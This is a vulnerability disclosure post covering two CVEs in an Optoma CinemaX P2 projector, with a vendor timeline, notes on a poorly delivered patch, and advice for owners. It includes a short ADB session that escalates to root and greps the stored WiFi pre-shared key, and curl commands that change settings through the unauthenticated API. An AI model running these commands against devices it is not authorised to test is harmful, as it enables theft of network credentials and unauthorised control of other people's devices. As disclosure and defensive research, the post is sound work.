CVE IDs: CVE-2026-30495, CVE-2026-30496 Vendor: Optoma / Coretronic Corporation Disclosure Date: 2026-02-01 Public Disclosure: 2026-05-02
TL;DR
I'd owned my Optoma CinemaX P2 projector for nearly four years when I decided 2026 would be the year I started looking at IoT devices. It took a matter of minutes to find that ADB was wide open on the network, and a few minutes more to get a root shell on it and extract my own WiFi password. Anyone on my network can do the same — no authentication required.
The projector was released in September 2020, but runs Android 8 with a security patch level from December 2017 - already 3 years out of date when it shipped. The last firmware update was July 2021 and addressed HDMI issues, not security. It ships with ADB wide open on the network and a working su binary.
I retested on 2026-02-08 after manually applying the latest available firmware (C13.2) and performing a factory reset — both vulnerabilities persisted. In March 2026, Optoma issued a new firmware that addresses the ADB issue (CVE-2026-30495), but leaves the unauthenticated control API (CVE-2026-30496) exploitable. That update is not pushed through the on-device updater, the version string is unchanged, and the release notes don't mention security — so most owners will never receive it.
Affected Products
I tested on a CinemaX P2, but based on shared firmware, these models are likely affected too:
| Model | Status |
|---|---|
| CinemaX P2 (X1VDPTHG) | Confirmed vulnerable |
| CinemaX P1 / UHZ65UST | Likely vulnerable (same device, regional naming) |
| CinemaX Pro | Likely vulnerable (same firmware platform) |
Affected Versions
All affected products report firmware version TVOS-04.24.010.04.01 with ro.build.display.id = P1_Lite-userdebug 8.0.0 OPR5.170623.014 TVOS-04.24.010.04.01 test-keys. Optoma did not change this string across the security rebuild, so the only reliable per-build identifier is the Android ro.build.date property:
Firmware build (ro.build.date) |
Release | CVE-2026-30495 (root ADB) |
|---|---|---|
Thu Jun 3 01:12:35 CST 2021 |
Distributed by Optoma as "C13.2", July 2021. | Vulnerable (ro.adb.secure=0) |
Wed Mar 4 17:57:00 CST 2026 |
Published on the Optoma EMEA download page on 2026-03-23, still labelled "C13.2" | Fixed (ro.adb.secure=1) |
CVE-2026-30496 (control API) is unfixed at this time.
Confirmed vulnerable, directly tested: CinemaX P2 (model X1VDPTHG).
The Vulnerabilities
CVE-2026-30495: Unauthenticated Remote Root Access (CVSS 9.6 Critical)
The projector exposes ADB (Android Debug Bridge) on port 5555 with no authentication required. From there you can trivially su to root. Here you go, wifi passwd stored in cleartext:
$ adb connect 192.168.1.73
connected to 192.168.1.73:5555
$ adb shell
P1_Lite:/ $ su
P1_Lite:/ # cat /data/misc/wifi/WifiConfigStore.xml | grep PreSharedKey
<string name="PreSharedKey">"REDACTED"</string>
That's it. No authentication, no prompts, no warnings. Anyone on your network can do this.
Exposed ADB is an actively exploited vector for IoT botnets — see Krebs on the Kimwolf botnet, The Kimwolf botnet is stalking your local network (January 2026), which targets exactly this kind of misconfiguration.
CVE-2026-30496: Unauthenticated Remote Control API (CVSS 6.3 Medium)
This isn't as severe as the first one, but there's an HTTP API on port 2345 that allows full remote control - not just reading settings, but changing them:
# Read volume
$ curl http://192.168.1.30:2345/get/Volume
93
# Change volume (no auth required)
$ curl http://192.168.1.30:2345/inc/Volume
94
# Set arbitrary value
$ curl -X PUT "http://192.168.1.30:2345/set/Volume?value=50"
0
# Mute the device
$ curl -X PUT "http://192.168.1.30:2345/set/Mute?value=1"
0
Anyone on your network can mess with your projector settings, possibly even hammering them to damage the projector.
How I Found This
I'd had the projector since March 2022. In January 2026 I decided to start poking at the IoT devices in my house. Literally this was the first thing I tried on the first device (start with the most expensive android device, where else?), and noticed port 5555 (ADB) and port 2345 (HTTP) open on the projector. Neither should be accessible on a network without authentication.
Vendor Response
I reported both issues to Optoma on 2026-02-01:
- Optoma UK / EMEA via the UK PSTI enquiry form
- Optoma US via the US support portal
Optoma US acknowledged the same day; Optoma EMEA acknowledged on 2026-02-04 and confirmed they had escalated the report to the relevant team. Optoma US never contacted me, nor responded to my followups after initial acknowledgement. EMEA did get back to me.
On 2026-03-23, Optoma EMEA notified me that a new firmware build was available addressing the ADB issue. Static analysis of the unflashed image confirms the relevant Android build flags are flipped:
ro.adb.secure=0→1ro.debuggable=1→0persist.sys.usb.config=adb→none
This addresses CVE-2026-30495. CVE-2026-30496 — the unauthenticated HTTP control API on port 2345 — is not mentioned in the release notes and is not addressed by the firmware image.
There are several problems with how the patch is being delivered:
- The new firmware is labelled C13.2, the same version string as the known-vulnerable build it replaces. There is no way for an owner to tell from the version number whether they have the patched build.
- The release notes do not mention either security issue.
- The firmware is not offered through the on-device update mechanism. I have checked many times over the years and have never been offered an update; this one is not offered either. Possibly a side-effect of the unchanged version string.
- The updated firmware is published on the Optoma Europe download page but not on the Optoma USA download page as of disclosure. The projector was sold in both regions.
The combination — silent release notes, no automatic update, partial geographic coverage, no version bump — means uptake will be very low. And even owners who manually apply the patch are still exposed via the unauthenticated control API.
What You Should Do
If you own one of these projectors:
Realistically, treat this device as compromised if it's ever been on a network exposed to the internet.
- Disconnect it from the network entirely if you don't need it online - if you only feed it video over HDMI from an Apple TV, set-top box, or laptop, the projector has no reason to be on WiFi or Ethernet at all. This is the only step that fully closes both vulnerabilities.
- Manually apply the March 2026 firmware from the Optoma Europe download page (or the UHZ65UST equivalent). It is not offered through the on-device updater, and at the time of writing it is not yet on the Optoma USA download page. The version string is unchanged, so check the file date rather than the in-projector version. This closes the ADB vector but not the unauthenticated control API.
- Isolate it - Put it on a separate VLAN or guest network. The unauthenticated control API on port 2345 is not addressed by any current firmware.
- Don't use it on shared networks - Hotels, offices, anywhere you don't control the network.
- Disable network features - If you don't need Alexa integration or remote control apps, don't use them.
- Block outbound traffic - At your firewall if possible.
Timeline
| Date | Event |
|---|---|
| September 2020 | CinemaX P2 released (shipped with Dec 2017 security patches - already 3 years outdated) |
| July 2021 | Last firmware update before this incident (HDMI/lip sync fixes only, no security updates) |
| March 2022 | I purchased the projector new at retail |
| December 2022 | CinemaX P2 discontinued from retail sale |
| January 2026 | Discovered ADB open, root access confirmed, started assessment |
| 2026-02-01 | Notified Optoma EMEA via UK PSTI form (Ticket #11594) and Optoma US (Ticket #2033016); CVEs requested from MITRE |
| 2026-02-02 | Optoma US acknowledged |
| 2026-02-04 | Optoma EMEA acknowledged, escalated to engineering |
| 2026-02-08 | Retested on latest available firmware (C13.2) after factory reset — both vulnerabilities persist |
| 2026-03-23 | Optoma EMEA released a new firmware build addressing the ADB issue |
| 2026-03-30 | Static analysis of the new firmware confirmed CVE-2026-30495 is mitigated; CVE-2026-30496 is not addressed; rollout deficiencies identified |
| 2026-05-02 | Public disclosure |
Technical Details
Full evidence available, on request:
- ADB session logs showing root escalation
- API testing logs showing unauthenticated control
- Network packet captures
- several other less severe vulnerabilities I haven't had a chance to report yet.
Questions? stefan@whitelabel.org
Comments
No comments yet. Be the first!
Leave a comment